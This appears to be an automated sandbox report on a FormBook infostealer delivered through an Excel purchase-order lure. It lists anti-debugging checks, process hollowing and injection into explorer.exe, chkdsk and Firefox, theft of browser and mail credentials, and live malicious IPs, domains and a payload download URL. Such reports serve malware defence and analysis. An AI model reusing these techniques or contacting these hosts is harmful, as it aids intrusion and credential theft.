Source: C:\Users\Public\vbc.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409A80 rdtsc 5_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040ACC0 LdrLoadDll, 5_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00580017 mov eax, dword ptr fs:[00000030h] 4_2_00580017
Source: C:\Users\Public\vbc.exe Code function: 5_2_00830080 mov ecx, dword ptr fs:[00000030h] 5_2_00830080
Source: C:\Users\Public\vbc.exe Code function: 5_2_008300EA mov eax, dword ptr fs:[00000030h] 5_2_008300EA
Source: C:\Users\Public\vbc.exe Code function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h] 5_2_008526F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008B0080 mov ecx, dword ptr fs:[00000030h] 8_2_008B0080
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008B00EA mov eax, dword ptr fs:[00000030h] 8_2_008B00EA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D26F8 mov eax, dword ptr fs:[00000030h] 8_2_008D26F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025526F8 mov eax, dword ptr fs:[00000030h] 9_2_025526F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.241.137 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 260000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: F80000 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: A40000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe Jump to behavior
Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2194662661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality:

Yara detected FormBook
Behavior Graph

Behavior Graph ID: 323718  Sample: PO11272020.xlsx  Startdate: 27/11/2020  Architecture: WINDOWS  Score: 100

Legend: process, signature, created file, DNS/IP info, is dropped, is Windows process, number of created registry values, number of created files, compiler (Visual Basic / Delphi / Java / .Net C# or VB.NET / C, C++ or other language), is malicious, Internet.

Top-level signatures:
  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Malicious sample detected (through community Yara rule)
  Antivirus detection for URL or domain
  17 other signatures

Process tree (node numbers are the graph's own):
  [10] EQNEDT32.EXE (started)
    DNS/IP: amachichywsdyjakelogontothecomputewsrty.ydns.eu 162.251.123.239, ports 49165, 80, UNREAL-SERVERSUS, Canada
    Dropped: C:\Users\user\AppData\Local\...\vbc[1].exe (PE32)
    Dropped: C:\Users\Public\vbc.exe (PE32)
    Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    -> [17] vbc.exe (started)
         Dropped: C:\Users\user\AppData\Roaming\...\vbc.exe (PE32)
         Signatures: Drops PE files to the startup folder; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
         -> [21] vbc.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              -> [24] explorer.exe (injected)
                   DNS/IP: www.gedefo.com 91.195.241.137, ports 49166, 49167, 80, SEDO-ASDE, Germany
                   DNS/IP: letstalkop.com 184.168.131.241, ports 49168, 49169, 80, AS-26496-GO-DADDY-COM-LLCUS, United States
                   DNS/IP: 2 other IPs or domains
                   Signature: System process connects to network (likely due to code injection or exploit)
                   -> [28] chkdsk.exe (started)
                        Dropped: C:\Users\user\AppData\...\98-logrv.ini (data)
                        Dropped: C:\Users\user\AppData\...\98-logri.ini (data)
                        Signatures: Detected FormBook malware; Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
                        -> [38] firefox.exe (started)
                             Dropped: C:\Users\user\AppData\...\98-logrf.ini (data)
                   -> [32] vbc.exe (started)
                        Signature: Injects a PE file into a foreign processes
                        -> [41] vbc.exe (started)
                             Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
                   -> [34] NETSTAT.EXE (started)
                        Signature: Tries to detect virtualization through RDTSC time measurements
                   -> [36] autochk.exe (started)
  [15] EXCEL.EXE (started)
    Dropped: C:\Users\user\Desktop\~$PO11272020.xlsx (data)

Contacted Public IPs

IP              | Domain  | Country       | ASN   | ASN Name                    | Malicious
91.195.241.137  | unknown | Germany       | 47846 | SEDO-ASDE                   | true
162.251.123.239 | unknown | Canada        | 64236 | UNREAL-SERVERSUS            | true
184.168.131.241 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

Contacted Domains

Name IP Active
www.gedefo.com 91.195.241.137 true
amachichywsdyjakelogontothecomputewsrty.ydns.eu 162.251.123.239 true
letstalkop.com 184.168.131.241 true
www.letstalkop.com unknown unknown
www.realestateworld.club unknown unknown

Contacted URLs

Name                                                                      | Malicious | Antivirus Detection     | Reputation
http://www.letstalkop.com/zsh/                                            | true      | Avira URL Cloud: safe   | unknown
http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exe    | true      | Avira URL Cloud: malware | unknown